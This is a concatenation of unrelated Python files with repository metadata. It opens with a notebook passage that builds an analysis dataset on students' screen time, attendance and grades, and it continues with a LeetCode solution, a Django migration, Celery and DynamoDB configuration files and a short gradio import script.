if (len(df)==1) :
return (df)
else :
df = df.loc[~(df['grade'] == '-0'),]
if (len(df)==1) :
return (df)
else :
df.sample(1, random_state=1801)
# In[34]:
grouped_grades = [u_df for u,u_df in all_grades.groupby(['user_idx','course_num_sem'])]
# In[36]:
all_grades = pd.concat([remove_dubs(df) for df in grouped_grades], ignore_index=True)
# Merge grades on attention measures:
# In[38]:
attention_w_grades = attention_filt_1.merge(all_grades, on = ['course_num_sem','user_idx','semester'], how = 'inner')
# Save the out dataset:
# In[39]:
attention_w_num_grades = attention_w_grades.loc[attention_w_grades.grade.isin(['-3','0','2','4','7','10','12']),]
# In[40]:
attention_w_num_grades.to_pickle('personal/asger/preprocessed_data/course_attention_performance.pkl')
# ## Build user level control variables
# Read in the input datesets for this section:
# In[67]:
screen_behav = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_notinclass.pkl')
grades_primary = pd.read_pickle('data/struct/features/grades_primary.pkl')
grades_highschool = pd.read_pickle('data/struct/features/grades_hs.pkl')
parent_edu = pd.read_pickle('data/struct/features/parent_edu.pkl')
parent_inc = pd.read_pickle('data/struct/features/parent_inc.pkl')
dem = pd.read_pickle('data/struct/features/demographics.pkl')
survey = pd.read_pickle('data/struct/features/survey.pkl')
organization_dtu = pd.read_pickle('data/preproc/dtu/organization.pkl')
user_map = pd.read_pickle('data/preproc/users/all_users.pkl').loc[:,['user_idx','user']]
organization_dtu = organization_dtu.merge(user_map, on='user', how='inner')
temp_context = cns.get_temporal_context_frame()[['hourbin','hour','semester']]
# Calculate the average screen behaviour out of class during daytime:
# In[68]:
def is_day(row) :
if ((1 <= row['hour']) and (row['hour'] <= 6)) :
return False
else :
return True
# In[69]:
temp_context['day'] = temp_context.apply(is_day, axis = 1)
screen_behav['hourbin'] = screen_behav['timebin'] // 3600 * 3600
screen_behav = screen_behav.merge(temp_context, on = 'hourbin')
screen_behav = screen_behav.loc[screen_behav.day, :]
screen_behav = screen_behav.drop(['timebin','hourbin','hour','day'], axis = 1)
# In[18]:
avr_screen_behav = screen_behav.groupby('user_idx', as_index = False).mean()
# Choose the relevant variables in the background variables datasets:
# In[10]:
grades_primary = grades_primary.reset_index()
grades_highschool = grades_highschool.reset_index()
parent_edu = parent_edu.reset_index()
parent_inc = parent_inc.reset_index()
dem = dem.reset_index()
# In[11]:
avr_screen_behav = avr_screen_behav[['user_idx','screentime','screencount']]
avr_screen_behav = avr_screen_behav.rename(columns = {'screentime' : 'screentime_outofclass', 'screencount' : 'screencount_outofclass'})
psychology = survey[['1_bfi_agreeableness', '1_bfi_conscientiousness', '1_bfi_extraversion', '1_bfi_neuroticism', '1_bfi_openness', '1_locus_of_control','1_ambition','1_self_efficacy']].copy()
psychology['user_idx'] = psychology.index
psychology = psychology.rename(columns={'1_bfi_agreeableness':'agreeableness', '1_bfi_conscientiousness':'conscientiousness', '1_bfi_extraversion':'extraversion', '1_bfi_neuroticism':'neuroticism', '1_bfi_openness':'openness', '1_locus_of_control':'locus_of_control', '1_ambition': 'ambition', '1_self_efficacy':'self_efficacy'})
health = survey[['1_bmi', '1_physical_activity', '1_smoke_freq']].copy()
health = health.rename(columns={'1_bmi':'bmi','1_physical_activity':'physichal_activity', '1_smoke_freq': 'smoke_freq'})
health['user_idx'] = health.index
chosen_grades_highschool = grades_highschool[['user_idx','hs_matematik','hs_gpa']]
chosen_grades_highschool = chosen_grades_highschool.rename(columns={'hs_matematik': 'hs_math'})
chosen_grades_primary = grades_primary[['user_idx', 'elem_matematik_exam','elem_gpa']]
chosen_grades_primary = chosen_grades_primary.rename(columns = {'elem_matematik_exam': 'elem_math'})
parent_edu_max = parent_edu[['user_idx', 'edu_max']]
parent_edu_max = parent_edu_max.rename(columns = {'edu_max':'parent_edu_max'})
parent_inc_mean_max = parent_inc[['user_idx', 'inc_max', 'inc_mean']]
parent_inc_mean_max = parent_inc_mean_max.rename(columns = {'inc_max':'parent_inc_max', 'inc_mean': 'parent_inc_mean'})
dem = dem.drop('immig_desc', axis=1)
organization_dtu = organization_dtu[['user_idx', 'study']]
# In[12]:
merged = avr_screen_behav.merge(chosen_grades_primary, on = 'user_idx', how = 'left')
merged = merged.merge(chosen_grades_highschool, on = 'user_idx', how = 'left')
merged = merged.merge(parent_edu_max, on = 'user_idx', how = 'left')
merged = merged.merge(parent_inc_mean_max, on = 'user_idx', how = 'left')
merged = merged.merge(dem, on = 'user_idx', how = 'left')
merged = merged.merge(psychology, on='user_idx',how='left')
merged = merged.merge(health, on='user_idx',how='left')
merged = merged.merge(organization_dtu, on='user_idx',how='left')
# In[79]:
merged.to_pickle('personal/asger/preprocessed_data/user_level_control_vars.pkl')
# ## Build user-course level control variables
# Read the input datasets for this section:
# In[35]:
screen_behav_ooc = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_notinclass.pkl')
screen_behav_inclass = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_inclass.pkl')
attend = pd.read_pickle('data/preproc/behavior/attendance_geofence.pkl')
temp_map = cns.get_temporal_context_frame()[['hourbin', 'hour', 'semester']]
# In[36]:
def is_day(row) :
if ((1 <= row['hour']) and (row['hour'] <= 6)) :
return False
else :
return True
# In[37]:
temp_map['day'] = temp_map.apply(is_day, axis = 1)
screen_behav_ooc['hourbin'] = screen_behav_ooc['timebin'] // 3600 * 3600
screen_behav_ooc = screen_behav_ooc.merge(temp_map, on = 'hourbin')
screen_behav_ooc = screen_behav_ooc.loc[screen_behav_ooc.day, :]
screen_behav_ooc = screen_behav_ooc.drop(['timebin','hourbin','hour','day'], axis = 1)
# In[38]:
temp_map['day'] = temp_map.apply(is_day, axis = 1)
screen_behav_inclass['hourbin'] = screen_behav_inclass['timebin'] // 3600 * 3600
screen_behav_inclass = screen_behav_inclass.merge(temp_map.drop('semester',axis=1), on = 'hourbin')
screen_behav_inclass = screen_behav_inclass.loc[screen_behav_inclass.day, :]
screen_behav_inclass = screen_behav_inclass.drop(['timebin','hourbin','hour','day'], axis = 1)
# In[39]:
avr_screen_behav_ooc_semester = screen_behav_ooc.groupby(['user_idx','semester'], as_index = False).mean()
# In[40]:
avr_screen_behav_inclass_semester = screen_behav_inclass.groupby(['user_idx','semester'], as_index = False).mean()
# Calculate how much of the time each user attended scheduled classtime for the courses, he/she was signed up for:
# In[41]:
attend = attend.rename(columns = {'timestamp_qrtr' : 'timebin'})
attend = attend.loc[~ np.isnan(attend.check_attend), :].copy()
attend['hourbin'] = attend['timebin'] // 3600 * 3600
attend = attend.merge(temp_map, on = 'hourbin', how = 'left')
attend = attend.drop(['hourbin'], axis = 1)
attend['course_num_sem'] = attend['course_number'] + "_" + attend['semester']
# In[42]:
avr_attendance = attend.drop(['course_number','timebin','hour','day'], axis = 1).groupby(['user_idx','course_num_sem','semester'],as_index=False).mean()
# In[43]:
avr_attendance = avr_attendance.rename(columns={'check_attend':'attendance'})
avr_attendance['attendance'] = avr_attendance['attendance']*100
# In[44]:
avr_attendance_semester = attend.drop(['course_number','timebin','hour'], axis = 1).groupby(['user_idx','semester'],as_index=False).mean()
# In[45]:
avr_attendance = avr_attendance.merge(avr_attendance_semester.rename(columns={'check_attend':'attendance_semester'}), on=['user_idx','semester'])
# In[47]:
avr_screen_behav_inclass_semester = avr_screen_behav_inclass_semester.rename(columns={'screentime':'screentime_semester'})
avr_screen_behav_ooc_semester = avr_screen_behav_ooc_semester.rename(columns={'screentime':'screentime_outofclass_semester'})
# In[49]:
usercoursectrls = avr_attendance.merge(avr_screen_behav_ooc_semester[['user_idx','semester','screentime_outofclass_semester']],on=['user_idx','semester'],how='left').merge(avr_screen_behav_inclass_semester[['user_idx','semester','screentime_semester']],on=['user_idx','semester'],how='left')
# In[51]:
usercoursectrls = usercoursectrls.drop(['semester','day'],axis=1)
# In[52]:
usercoursectrls.to_pickle('personal/asger/preprocessed_data/user_course_level_control_vars.pkl')
# ## Build analysis dataset
# Read in the input datasets for this section:
# In[80]:
course_att_perf = pd.read_pickle('personal/asger/preprocessed_data/course_attention_performance.pkl')
user_cont_vars = pd.read_pickle('personal/asger/preprocessed_data/user_level_control_vars.pkl')
user_course_cont_vars = pd.read_pickle('personal/asger/preprocessed_data/user_course_level_control_vars.pkl')
# Merge the control variables in the attention performance dataset:
# In[82]:
analysis = course_att_perf.merge(user_cont_vars, on=['user_idx'], how='left').merge(user_course_cont_vars, on=['user_idx', 'course_num_sem'], how='left')
# In[84]:
analysis_filt1 = analysis.loc[~((analysis.screentime_outofclass == 0) & (analysis.screentime_uavr == 0))].copy()
# In[86]:
analysis_filt2 = analysis_filt1[analysis_filt1['measurement_count']>=40]
# In[88]:
analysis_filt2.to_csv('personal/asger/preprocessed_data/analysis.csv', index=False)
# In[35]:
x = analysis_filt2[['user_idx','semester','course_num_sem', 'screentime_short_ses',
'screencount_short_ses', 'screentime_long_ses', 'screencount_long_ses',
'screentime', 'screencount','attendance','grade']]
# In[36]:
x.to_pickle('personal/asger/preprocessed_data/screen_attendance_course_specific.pkl')
| 2.703125
| 3
|
src/283. Move Zeroes.py
|
rajshrivastava/LeetCode
| 1
|
12784846
|
<filename>src/283. Move Zeroes.py
class Solution:
def moveZeroes(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
ptr1 = 0
for num in nums:
if num:
nums[ptr1] = num
ptr1 += 1
for i in range(ptr1, len(nums)):
nums[i] = 0
| 3.5625
| 4
|
apps/Testings/migrations/0004_auto_20170925_1703.py
|
ulibn/BlueXolo
| 21
|
12784847
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-25 22:03
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Testings', '0003_collection'),
]
operations = [
migrations.RenameField(
model_name='collection',
old_name='products',
new_name='product',
),
]
| 1.679688
| 2
|
wowgic/old_builds/wowgic_flask_3Mar/config/celeryconfig.py
|
chelladurai89/wowgicbackend2.0
| 0
|
12784848
|
import os
from celery.schedules import crontab
CELERY_BROKER_URL='amqp://guest@localhost//'
CELERY_RESULT_BACKEND = 'mongodb://localhost:27017/'
CELERY_MONGODB_BACKEND_SETTINGS = {
'database': 'wowgicflaskapp',
'taskmeta_collection': 'my_taskmeta_collection',
}
#CELERY_ACCEPT_CONTENT = ['pickle', 'json']
#CELERY_TASK_SERIALIZER='json'
#CELERY_RESULT_SERIALIZER='json'
#CELERY_TIMEZONE='Europe/Oslo'
CELERY_ENABLE_UTC=True
IP = os.uname()[1]
PORT = 8080
NEO4J_IP='127.0.0.1'
MONGODB_HOST = '127.0.0.1'
MONGODB_PORT = '27017'
MONGODB_USERNAME = 'admin'
MONGODB_PASSWORD = '<PASSWORD>'
LOGGER_NAME='wowgic_dev'
CELERYBEAT_SCHEDULE = {# Executes every Monday morning at 7:30 A.M
'getAllInterestNode_every15mins': {
'task': 'tasks.getAllInterestNode',
'schedule': crontab(minute='*/15'),
},
}
| 1.882813
| 2
|
appzoo/apps_gradio/demo.py
|
SunYanCN/AppZoo
| 5
|
12784849
|
<filename>appzoo/apps_gradio/demo.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : AppZoo.
# @File : demo
# @Time : 2021/9/6 上午9:51
# @Author : yuanjie
# @WeChat : 313303303
# @Software : PyCharm
# @Description :
# /Users/yuanjie/Library/Python/3.7/lib/python/site-packages/pip
# <module 'gradio' from '/Users/yuanjie/Library/Python/3.7/lib/python/site-packages/gradio/__init__.py'>
import gradio
print(gradio)
| 1.484375
| 1
|
config.py
|
corbinmcneill/bonkbot
| 1
|
12784850
|
import boto3
#class Command:
# def __init__(self, description,
class Config:
dynamodb = boto3.resource('dynamodb')
def __init__(self, table_name):
self.table = self.dynamodb.Table(table_name)
def get(self, key):
response = self.table.get_item(Key = {'Key' : key}, ConsistentRead = True)
return response['Item']['Value']
def put(self, key, value):
self.table.put_item(Item = {'Key' : key, 'Value' : value})
config = Config('BonkBotConfig')
# using the singleton pattern
def get_instance():
return config
| 2.5625
| 3
|